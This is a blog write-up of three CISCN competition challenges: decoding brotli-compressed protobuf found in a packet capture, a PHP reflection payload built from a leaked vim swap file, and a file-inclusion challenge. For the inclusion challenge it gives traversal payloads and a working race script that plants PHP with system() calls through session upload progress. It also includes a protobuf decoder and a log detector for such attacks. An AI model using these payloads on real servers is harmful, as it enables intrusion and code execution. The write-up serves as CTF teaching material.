CISCN National Competition Preliminary

Preface

I took part in the CISCN national competition these past few days with tony, Trendy and Kaunm.

tiny traffic

First, download the attachment and open it in Wireshark.

image-20210516233222805

Export the HTTP objects directly (File > Export Objects > HTTP).

image-20210516223609047

Among the exported HTTP objects, two suspicious files turn up (saved below as test and secret).

image-20210516224056416

After a hint from Wankko Ree it turned out to be protobuf (Protocol Buffers), which I then learned on the spot.

Both files were served brotli-compressed, so decompress them first:

import brotli

# Both exported objects are brotli-compressed: test is the .proto schema,
# secret is the serialized message that schema describes.
with open("test", 'rb') as f:
    test = brotli.decompress(f.read())
with open("secret", 'rb') as f:
    secret = brotli.decompress(f.read())

# Write the schema out so protoc can compile it
with open("test.proto", 'wb') as f:
    f.write(test)

Running this produces test.proto.

Next, compile the .proto with protoc to get the Python bindings (I followed this guide):

https://blog.csdn.net/whatday/article/details/95353523

image-20210516224952339

That generated test_pb2.py for me; now decode the protobuf message directly:

from test_pb2 import PBResponse   # generated by protoc from test.proto
import brotli

# Decompress the captured message and parse it with the generated class
pbr = PBResponse()
with open("secret", 'rb') as f:
    secret = brotli.decompress(f.read())
pbr.ParseFromString(secret)
print(pbr)

Running it gives

image-20210516225218276
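
Before the .proto is in hand you can already walk the wire format by hand, which is what you are reduced to when a capture contains protobuf and no schema. The following is an added example, not code from the original post or the challenge: a minimal protobuf wire-format decoder in pure Python, run over a constructed message whose field numbers and values are invented for illustration (they are not the real PBResponse layout). It reports field numbers and wire types, never field names, because names only exist in the .proto.

```python
# Minimal protobuf wire-format decoder (added example, not from the challenge).
# Knows only the encoding rules, so it yields (field number, wire type, value).

def read_varint(buf, pos):
    """Decode a base-128 varint starting at buf[pos]; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint longer than 10 bytes")


def decode_message(buf):
    """Return [(field_number, wire_type, value), ...] in the order encountered.

    wire type 0 -> int, 1 -> 64-bit int, 5 -> 32-bit int, 2 -> raw bytes
    (a string, a nested message or packed repeated scalars; the caller decides).
    The deprecated group wire types 3/4 are rejected rather than skipped.
    """
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field_no, wire_type = key >> 3, key & 0x7
        if field_no == 0:
            raise ValueError("field number 0 is invalid")
        if wire_type == 0:
            value, pos = read_varint(buf, pos)
        elif wire_type in (1, 5):
            width = 8 if wire_type == 1 else 4
            chunk = buf[pos:pos + width]
            if len(chunk) != width:
                raise ValueError("truncated fixed-width field")
            value = int.from_bytes(chunk, "little")
            pos += width
        elif wire_type == 2:
            length, pos = read_varint(buf, pos)
            value = buf[pos:pos + length]
            if len(value) != length:
                raise ValueError("truncated length-delimited field")
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.append((field_no, wire_type, value))
    return fields


def looks_like_message(data):
    """Heuristic: does this length-delimited blob itself parse as a message?
    Short ASCII strings usually fail (their bytes decode to bogus wire types)."""
    try:
        decode_message(data)
        return len(data) > 0
    except ValueError:
        return False


def dump(buf, indent=0):
    """Pretty-print a message, recursing into blobs that parse as messages."""
    pad = "  " * indent
    for field_no, wire_type, value in decode_message(buf):
        if wire_type == 2 and looks_like_message(value):
            print(f"{pad}field {field_no} (message):")
            dump(value, indent + 1)
        elif wire_type == 2:
            try:
                shown = value.decode("utf-8")
            except UnicodeDecodeError:
                shown = value.hex()
            print(f"{pad}field {field_no} (bytes/string): {shown!r}")
        else:
            print(f"{pad}field {field_no} (wire type {wire_type}): {value}")


# Constructed sample (invented field numbers): field 1 = varint 150,
# field 2 = "testing", field 3 = nested message { field 1 = "hello" }.
SAMPLE = (bytes([0x08, 0x96, 0x01])                       # key 1|varint, 150
          + bytes([0x12, 0x07]) + b"testing"               # key 2|len, 7 bytes
          + bytes([0x1A, 0x07, 0x0A, 0x05]) + b"hello")    # key 3|len wrapping key 1|len

if __name__ == "__main__":
    dump(SAMPLE)
```

When a blob under wire type 2 is ambiguous, compare against the generated class once you have it: ParseFromString on the same bytes will name the fields this decoder can only number.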

At this point, those of us whose English is as bad as mine have to open a translator.

image-20210516225618355

CISCN{e66a22e23457889b0fb1146d172a38dc}

easy_source

Opening the challenge shows a single sentence and nothing else.

The experts, however, had long since pulled out a directory scanner.

It found: http://139.9.117.249:20772/.index.php.swo (a leftover vim swap file, which leaks the source of index.php)

image-20210516225921096

Auditing that code gives the payload:

payload: rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

(i.e. new ReflectionMethod('User', 'q') followed by ->getDocComment(), which returns the /** ... */ doc comment written on User::q())

middle_source

First, look at the code

image-20210516230748310

The code shown has an include, so this is a file inclusion challenge, and the prompt points at /etc.

We first have to get around the variable overwrite; payload: field=cf&cf=../../../etc/passwd

It comes back, but that alone is of no use.

So out comes my directory scanner again

image-20210516231042816

A suspicious directory shows up; open it and have a look

image-20210516231124896

Looking at you_can_seeeeeeee_me.php opens up a whole other world

image-20210516231309815

Read the phpinfo carefully: sessions are enabled. For the trick below you also want session.upload_progress.enabled = On (the default) and session.use_strict_mode = Off, so that a PHPSESSID we make up ourselves gets its own session file; session.upload_progress.cleanup = On (also the default) deletes that file as soon as the upload finishes, which is why the include has to race the upload.

Anyone who has studied session-based inclusion will already have Burp running at this point.

Here is a Python script that wins the race and lists the flag directory:

#coding=utf-8
import io
import requests
import threading

URL = 'http://139.9.117.249:20829/index.php'
sessid = 'TGAO'   # any value works when session.use_strict_mode is Off
# Reader request: cf traverses to our session file, cmd is what gets executed
data = {"cmd": "system('ls -l /etc');",
        "cf": "../../../var/lib/php/sessions/aaacgceaie/sess_TGAO"}
# PHP written into the session file by session.upload_progress while the upload is in flight
payload = '<?php var_dump(scandir("/etc/ehiehcdjab/ffcfdcbibj/deaebgchdj/ibecedbjff/fedicbaabe/fl444444g"));?>'
done = threading.Event()

def write(session):
    # Keep a large upload going so the session file keeps being recreated
    while not done.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(URL,
                     data={'PHP_SESSION_UPLOAD_PROGRESS': payload},
                     files={'file': ('tgao.txt', f)},
                     cookies={'PHPSESSID': sessid})

def read(session):
    # Race the cleanup: include the session file before PHP deletes it
    while not done.is_set():
        resp = session.post(URL, data=data)
        # the upload filename only shows up in the response if our session data was included
        if 'tgao.txt' in resp.text:
            print(resp.text)
            done.set()
        else:
            print("[+++++++++++++]retry")

if __name__ == "__main__":
    with requests.session() as session:
        threads = []
        for i in range(1, 30):
            threads.append(threading.Thread(target=write, args=(session,)))
        for i in range(1, 30):
            threads.append(threading.Thread(target=read, args=(session,)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()   # keep the session open until a reader wins

image-20210516232440414

payload: cf=../../../etc/ehiehcdjab/ffcfdcbibj/deaebgchdj/ibecedbjff/fedicbaabe/fl444444g

image-20210516232419962
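
The same attack seen from the server's access log: the traversal, the variable-overwrite shape (field=cf&cf=...) and the include of a sess_ file are all visible in the query string. This is an added example, not part of the original writeup. The log lines are constructed Apache-style records that mirror the challenge's index.php and its cf/field parameters; the list of sensitive paths and the parameter-name heuristic are assumptions to tune for real traffic.

```python
# Log-side view of the LFI / session-include attack (added example, not from the writeup).
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths an include() should never be pointed at (assumed list, extend as needed)
SENSITIVE = ("/etc/passwd", "/proc/self/environ", "/var/log/", "sess_")


def normalize(value):
    """Percent-decode until stable so %252e%252e%252f is seen as ../ too;
    fold backslashes into slashes."""
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def analyse(line):
    """Return a dict describing the request if it looks like an LFI attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qsl(urlsplit(m.group("url")).query, keep_blank_values=True)
    names = {name for name, _ in params}
    findings = []
    for name, raw in params:
        value = normalize(raw)
        # field=cf&cf=...: one parameter names the variable another one fills,
        # the variable-overwrite shape used against middle_source (heuristic)
        if value in names and value != name:
            findings.append(f"variable-overwrite pattern: {name}={value}")
        if "../" in value:
            findings.append(f"traversal in {name}")
        if any(s in value for s in SENSITIVE):
            findings.append(f"sensitive path in {name}")
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "url": m.group("url"), "status": int(m.group("status")),
            "findings": findings}


def scan(log_text):
    """Run analyse() over every line; return only the hits, in log order."""
    return [hit for hit in (analyse(l) for l in log_text.splitlines()) if hit]


# Constructed sample log (not real traffic); the first line is benign.
SAMPLE_LOG = """\
1.2.3.4 - - [16/May/2021:22:09:58 +0800] "GET /index.php?cf=welcome HTTP/1.1" 200 211
1.2.3.4 - - [16/May/2021:22:10:01 +0800] "GET /index.php?field=cf&cf=../../../etc/passwd HTTP/1.1" 200 1823
1.2.3.4 - - [16/May/2021:22:10:09 +0800] "GET /index.php?cf=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1823
1.2.3.4 - - [16/May/2021:22:10:12 +0800] "GET /index.php?cf=../../../var/lib/php/sessions/sess_TGAO HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["url"], "->", "; ".join(hit["findings"]))
```

The race script above sends cf in a POST body, which a plain access log does not record, so on a real server pair this with request-body logging (or a WAF log) and alert on PHP_SESSION_UPLOAD_PROGRESS values that contain <?php.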

Posted 2021-05-16 23:34 by 小非鱼